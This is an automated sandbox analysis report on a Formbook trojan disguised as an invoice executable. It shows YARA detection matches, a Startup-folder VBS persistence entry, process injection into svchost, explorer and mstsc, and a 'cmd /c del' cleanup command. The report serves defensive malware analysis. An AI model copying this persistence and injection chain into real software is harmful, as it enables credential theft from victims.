Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: name.exe PID: 3700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 2768, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 2100, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6680, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mstsc.exe PID: 4640, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@246/17@7/2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004737B5 GetLastError,FormatMessageW,

0_2_004737B5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004610BF AdjustTokenPrivileges,CloseHandle,	0_2_004610BF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_004616C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006810BF AdjustTokenPrivileges,CloseHandle,	2_2_006810BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_006816C3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004751CD

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0048A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0048A67C

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0047648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047648E

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_004042A2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\autD446.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File read: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 7332
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: credui.dll	Jump to behavior
